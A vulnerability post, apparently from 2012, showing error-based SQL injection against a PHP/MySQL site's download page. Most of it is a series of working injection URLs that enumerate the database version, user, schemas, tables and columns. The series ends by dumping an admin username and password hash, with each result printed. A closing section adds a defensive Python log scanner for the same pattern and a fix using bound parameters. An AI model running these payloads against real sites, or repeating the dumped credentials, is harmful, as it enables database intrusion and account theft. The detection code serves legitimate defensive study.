
PHP + MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had wanted to find something to test this on and did not expect to find one here; I can test it, this is just for the record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate the databases one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate the table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate the column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********dump the data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
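
A defender-side check for the request pattern in the post above, as an added example that is not part of the original post: it decodes each logged request target and flags those that combine count(*), GROUP BY and floor(rand(0)*2). The log lines, client addresses and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Building blocks of the duplicate-key error pattern in the requests above.
SIGNATURES = {
    "rand_key": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"group\s+by"),
    "metadata": re.compile(r"information_schema\s*\.\s*\w+"),
}
CORE = {"rand_key", "count", "group_by"}  # all three must appear together
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def normalise(target):
    """Percent-decode until stable (at most 3 passes), then fold case,
    inline comments and whitespace so spacing tricks do not hide keywords."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    target = re.sub(r"/\*.*?\*/", " ", target.lower(), flags=re.S)
    return re.sub(r"\s+", " ", target)

def matched_parts(target):
    text = normalise(target)
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}

def scan(lines):
    """Return (client, status, parts) for each request holding every CORE part."""
    alerts = []
    for line in lines:
        m = REQUEST.match(line)
        if m and CORE <= (parts := matched_parts(m.group(2))):
            alerts.append((m.group(1), int(m.group(3)), sorted(parts)))
    return alerts

def log_line(ip, target, status):  # constructed combined-log-format line
    return f'{ip} - - [13/Sep/2012:17:40:01 +0800] "GET {target} HTTP/1.1" {status} 512'

BASE = "/download/downpage/netarea/id/1600003"
SAMPLE_LOG = [  # constructed; clients use documentation IP ranges
    log_line("192.0.2.10", BASE + "/wapc/5000_0005_003", 200),
    log_line("198.51.100.7", BASE + "'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),"
             "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003", 200),
    log_line("198.51.100.7", BASE + "%27%20OR%201=(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20user()),"
             "FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP/**/BY%20x)a)%23", 200),
    log_line("192.0.2.44", "/search?q=group+by+count", 200),
]
```

A hit shows that the pattern was sent, not that it worked; the underlying fix is to bind the id value as a query parameter instead of concatenating it into the SQL string.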
